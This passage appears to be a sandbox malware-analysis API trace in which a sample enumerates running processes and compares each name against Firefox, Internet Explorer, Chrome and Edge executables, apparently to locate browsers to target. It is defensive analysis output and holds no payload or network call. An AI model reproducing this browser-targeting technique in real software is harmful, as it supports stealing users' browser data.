(lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0188.679] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.679] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0188.679] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0188.679] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0188.679] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.679] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0188.680] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0188.680] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0188.680] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0188.680] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.680] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0188.681] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0188.681] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0188.681] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0188.681] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0188.681] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0188.681] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0188.681] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0188.681] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.681] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0188.682] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0188.682] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0188.682] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0188.682] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.682] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0188.682] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0188.682] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0188.682] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0188.683] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0188.683] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0188.683] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0188.683] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0188.683] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.683] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.684] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.684] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.685] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.685] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.686] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.686] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.686] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.686] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.686] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0188.686] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0188.686] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0188.686] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0188.686] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.687] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.687] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.687] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.687] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.687] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.688] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.688] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.688] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.688] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0188.688] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0188.688] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0188.688] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0188.688] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.688] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0188.689] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0188.689] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0188.689] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0188.689] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0188.689] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0188.689] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0188.689] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0188.689] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.689] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0188.690] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0188.690] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0188.690] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0188.690] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.690] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0188.690] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0188.690] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0188.690] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0188.690] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0188.691] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0188.691] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0188.691] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0188.691] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.691] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0188.692] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0188.692] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0188.692] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0188.692] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0188.692] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0188.692] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0188.692] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0188.692] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.692] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0188.693] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0188.693] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0188.693] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0188.693] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0188.693] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0188.693] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0188.693] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0188.693] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.693] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0188.694] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0188.694] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0188.694] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0188.694] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.694] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0188.694] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0188.695] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0188.695] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0188.695] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0188.695] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0188.695] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0188.695] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0188.695] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.695] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0188.696] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0188.696] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0188.696] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0188.696] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0188.696] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0188.696] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0188.696] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0188.696] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.696] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0188.697] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0188.697] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0188.697] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0188.697] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0188.697] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0188.697] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0188.697] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0188.697] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.697] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0188.698] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0188.698] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0188.698] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0188.698] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.698] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0188.698] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0188.699] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0188.699] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0188.699] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0188.699] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0188.699] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0188.699] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0188.699] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.699] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0188.700] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0188.700] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0188.700] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0188.700] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0188.700] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0188.700] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0188.700] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0188.700] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.700] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0188.701] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0188.701] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0188.701] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0188.701] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.701] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0188.701] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0188.701] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0188.701] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0188.701] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0188.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0188.702] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0188.702] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0188.702] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0188.702] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0188.702] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, 